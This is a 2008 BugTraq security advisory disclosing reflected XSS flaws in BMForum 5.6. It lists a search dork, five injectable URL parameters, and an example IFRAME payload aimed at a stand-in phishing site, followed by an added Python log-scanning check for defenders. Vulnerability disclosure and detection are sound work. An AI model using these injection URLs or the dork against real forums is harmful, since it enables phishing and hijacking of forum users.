BugTraq
BMForum Remote 5.6 Multiple XSS Vulnerability May 22 2008 01:12PM
tan_prathan hotmail com
==========================================================

BMForum Remote 5.6 Multiple XSS Vulnerability

==========================================================

AUTHOR : CWH Underground

DATE : 22 May 2008

SITE : www.citec.us

#####################################################

APPLICATION : BMForum

VERSION : 5.6 (Latest Version)

VENDOR : http://downloads.sourceforge.net/bmforum

#####################################################

DORK: "powered by BMForum"

---Exploit---

[-] http://[target]/[BBForum_path]/index.php?outpused=<XSS>

[-] http://[target]/[BBForum_path]/newtem/footer/bsd01footer.php?footer_copyright=<XSS>

[-] http://[target]/[BBForum_path]/newtem/footer/bsd01footer.php?verandproname=<XSS>

[-] http://[target]/[BBForum_path]/newtem/header/bsd01header.php?topads=<XSS>

[-] http://[target]/[BBForum_path]/newtem/header/bsd01header.php?myplugin=<XSS>

--- Note ---

Using the 'IFRAME' tag makes this very dangerous, since it enables phishing techniques.

Example: http://[target]/[BBForum_path]/index.php?outpused=<IFRAME src=http://phisherpage.com width="900" height="600">

##################################################################

# Greetz: ZeQ3uL,BAD $ectors, Snapter, Conan, Win7dos, JabAv0C #

##################################################################
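For defenders, the scripts and parameters listed above can be turned into an access-log check. The following is an added example, not part of the original advisory: it flags requests that pass tag characters in any of the five listed parameters, including percent-encoded and double-encoded values. The log lines are constructed samples; the combined log format, the /forum/ install path, and the function names are assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Script path suffix -> parameters named in the advisory.
ADVISORY_PARAMS = {
    "index.php": {"outpused"},
    "newtem/footer/bsd01footer.php": {"footer_copyright", "verandproname"},
    "newtem/header/bsd01header.php": {"topads", "myplugin"},
}
# Assumption: combined-format access log with the request line in quotes.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
MARKUP_RE = re.compile(r"[<>]")  # tag delimiters, as in the <IFRAME> example
# Constructed sample lines (not real traffic); /forum/ is an assumed path.
SAMPLE_LOG = [
    '192.0.2.10 - - [22/May/2008:13:12:00 +0000] "GET /forum/index.php?outpused=%3CIFRAME%20src%3Dhttp%3A%2F%2Fexample.invalid%3E HTTP/1.1" 200 5120',
    '192.0.2.11 - - [22/May/2008:13:12:05 +0000] "GET /forum/newtem/header/bsd01header.php?topads=%253Cb%253E HTTP/1.1" 200 812',
    '192.0.2.12 - - [22/May/2008:13:12:09 +0000] "GET /forum/index.php?page=2 HTTP/1.1" 200 9000',
]


def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding (e.g. %253C -> %3C -> <)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_params(log_line):
    """Return sorted advisory parameter names whose value contains < or >."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    try:
        url = urlsplit(match.group(1))
    except ValueError:  # malformed request target
        return []
    path = fully_decode(url.path).lower()
    hits = set()
    for suffix, params in ADVISORY_PARAMS.items():
        if not path.endswith("/" + suffix):
            continue
        # parse_qsl decodes one layer; fully_decode handles any further layers.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if name in params and MARKUP_RE.search(fully_decode(value)):
                hits.add(name)
    return sorted(hits)
```

Calling `suspicious_params` on each line of an access log yields the parameter names to review for that request; an empty list means the line did not match.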

Copyright 2010, SecurityFocus